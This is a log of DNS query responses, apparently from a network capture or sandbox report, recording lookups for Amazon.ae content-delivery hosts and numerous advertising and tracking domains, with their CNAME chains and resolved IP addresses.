                                                                                                                                                                                                        Aug 15, 2024 15:38:02.044799089 CEST1.1.1.1192.168.2.40xac8No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.044799089 CEST1.1.1.1192.168.2.40xac8No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.045424938 CEST1.1.1.1192.168.2.40xc72cNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.045424938 CEST1.1.1.1192.168.2.40xc72cNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.045424938 CEST1.1.1.1192.168.2.40xc72cNo error (0)c.media-amazon.com18.165.191.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.78.35.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.75.127.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.49.71.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com99.81.216.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.155.30.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.229.128.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.047600031 CEST1.1.1.1192.168.2.40xa985No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.31.133.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.090403080 CEST1.1.1.1192.168.2.40x3fffNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.090403080 CEST1.1.1.1192.168.2.40x3fffNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.090403080 CEST1.1.1.1192.168.2.40x3fffNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.101135015 CEST1.1.1.1192.168.2.40x1dc5No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.101135015 CEST1.1.1.1192.168.2.40x1dc5No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.101135015 CEST1.1.1.1192.168.2.40x1dc5No error (0)dlsq0ztllwnya.cloudfront.net108.156.39.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.101135015 CEST1.1.1.1192.168.2.40x1dc5No error (0)dlsq0ztllwnya.cloudfront.net108.156.39.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.101135015 CEST1.1.1.1192.168.2.40x1dc5No error (0)dlsq0ztllwnya.cloudfront.net108.156.39.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.101135015 CEST1.1.1.1192.168.2.40x1dc5No error (0)dlsq0ztllwnya.cloudfront.net108.156.39.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.116410017 CEST1.1.1.1192.168.2.40xbb24No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.116410017 CEST1.1.1.1192.168.2.40xbb24No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:14.411952019 CEST1.1.1.1192.168.2.40x9fccNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:14.411952019 CEST1.1.1.1192.168.2.40x9fccNo error (0)unagi-eu.amazon.com54.239.35.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:14.411966085 CEST1.1.1.1192.168.2.40xa150No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.444761992 CEST1.1.1.1192.168.2.40x8cf7No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.444761992 CEST1.1.1.1192.168.2.40x8cf7No error (0)aax-eu-retail-direct.amazon-adsystem.com52.94.222.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.446693897 CEST1.1.1.1192.168.2.40xfa56No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.570271969 CEST1.1.1.1192.168.2.40x618bNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.572247028 CEST1.1.1.1192.168.2.40x3d9aNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.572247028 CEST1.1.1.1192.168.2.40x3d9aNo error (0)unagi-eu.amazon.com54.239.35.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.213217020 CEST1.1.1.1192.168.2.40xbed6No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.213217020 CEST1.1.1.1192.168.2.40xbed6No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.330404043 CEST1.1.1.1192.168.2.40x64beNo error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.331654072 CEST1.1.1.1192.168.2.40xe0c8No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.331654072 CEST1.1.1.1192.168.2.40xe0c8No error (0)aax-eu-retail-direct.amazon-adsystem.com52.94.222.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.339451075 CEST1.1.1.1192.168.2.40x2e1bNo error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.382698059 CEST1.1.1.1192.168.2.40x3772No error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.382698059 CEST1.1.1.1192.168.2.40x3772No error (0)completion.amazon.co.uk3.253.166.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.597048998 CEST1.1.1.1192.168.2.40xec2bNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.598206043 CEST1.1.1.1192.168.2.40xb6caNo error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.598206043 CEST1.1.1.1192.168.2.40xb6caNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.598206043 CEST1.1.1.1192.168.2.40xb6caNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414324045 CEST1.1.1.1192.168.2.40x5009No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414587975 CEST1.1.1.1192.168.2.40xdb6dNo error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414587975 CEST1.1.1.1192.168.2.40xdb6dNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414587975 CEST1.1.1.1192.168.2.40xdb6dNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.414587975 CEST1.1.1.1192.168.2.40xdb6dNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:27.719448090 CEST1.1.1.1192.168.2.40xe035No error (0)aax-eu.amazon-adsystem.com52.95.115.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.629488945 CEST1.1.1.1192.168.2.40x3624No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)match.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com34.251.192.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com34.249.40.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com52.212.172.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com54.154.214.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com52.30.189.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com52.49.255.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com54.194.128.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675489902 CEST1.1.1.1192.168.2.40x16c0No error (0)euw-ice.360yield.com52.30.124.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675982952 CEST1.1.1.1192.168.2.40xc31No error (0)match.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.675982952 CEST1.1.1.1192.168.2.40xc31No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.695043087 CEST1.1.1.1192.168.2.40x6ec4No error (0)audex.userreport.comd2u28gf9o4d1cv.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.695043087 CEST1.1.1.1192.168.2.40x6ec4No error (0)d2u28gf9o4d1cv.cloudfront.net3.164.163.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.695043087 CEST1.1.1.1192.168.2.40x6ec4No error (0)d2u28gf9o4d1cv.cloudfront.net3.164.163.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.695043087 CEST1.1.1.1192.168.2.40x6ec4No error (0)d2u28gf9o4d1cv.cloudfront.net3.164.163.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.695043087 CEST1.1.1.1192.168.2.40x6ec4No error (0)d2u28gf9o4d1cv.cloudfront.net3.164.163.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.702327967 CEST1.1.1.1192.168.2.40x10f7No error (0)audex.userreport.comd2u28gf9o4d1cv.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.702493906 CEST1.1.1.1192.168.2.40x972fNo error (0)rd.frontend.weborama.fr35.190.24.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704786062 CEST1.1.1.1192.168.2.40x13b5No error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704914093 CEST1.1.1.1192.168.2.40x7f99No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704941988 CEST1.1.1.1192.168.2.40xce32No error (0)bs.serving-sys.combs.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704941988 CEST1.1.1.1192.168.2.40xce32No error (0)aka-fr.ads.sizmdx.comadserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704941988 CEST1.1.1.1192.168.2.40xce32No error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com3.72.129.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704941988 CEST1.1.1.1192.168.2.40xce32No error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com52.28.212.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.704941988 CEST1.1.1.1192.168.2.40xce32No error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com52.29.96.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.707189083 CEST1.1.1.1192.168.2.40xd8a2No error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.707218885 CEST1.1.1.1192.168.2.40x4d31No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.707218885 CEST1.1.1.1192.168.2.40x4d31No error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.707724094 CEST1.1.1.1192.168.2.40xbef7No error (0)bs.serving-sys.combs.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.707724094 CEST1.1.1.1192.168.2.40xbef7No error (0)aka-fr.ads.sizmdx.comadserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)cookie-matching.mediarithmics.comlb.mediarithmics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714340925 CEST1.1.1.1192.168.2.40x1632No error (0)lb.mediarithmics.com54.36.150.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.714395046 CEST1.1.1.1192.168.2.40x87efNo error (0)cookie-matching.mediarithmics.comlb.mediarithmics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.717060089 CEST1.1.1.1192.168.2.40xf658No error (0)cm.g.doubleclick.net142.250.186.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.724375010 CEST1.1.1.1192.168.2.40xbc3fNo error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.724404097 CEST1.1.1.1192.168.2.40x384aNo error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com217.182.178.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com91.134.110.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com51.178.195.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com178.32.197.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com5.196.111.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com178.32.197.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com91.134.110.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com51.178.195.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com149.202.238.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com5.135.209.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com217.182.178.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com5.135.209.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com164.132.25.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com149.202.238.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com164.132.25.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.886004925 CEST1.1.1.1192.168.2.40xcc55No error (0)rtb-csync-euw2.smartadserver.com5.196.111.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.887526035 CEST1.1.1.1192.168.2.40x5f4dNo error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.887578011 CEST1.1.1.1192.168.2.40x212eNo error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.887578011 CEST1.1.1.1192.168.2.40x212eNo error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.889013052 CEST1.1.1.1192.168.2.40xd04eNo error (0)dsum-sec.casalemedia.com65IN (0x0001)false
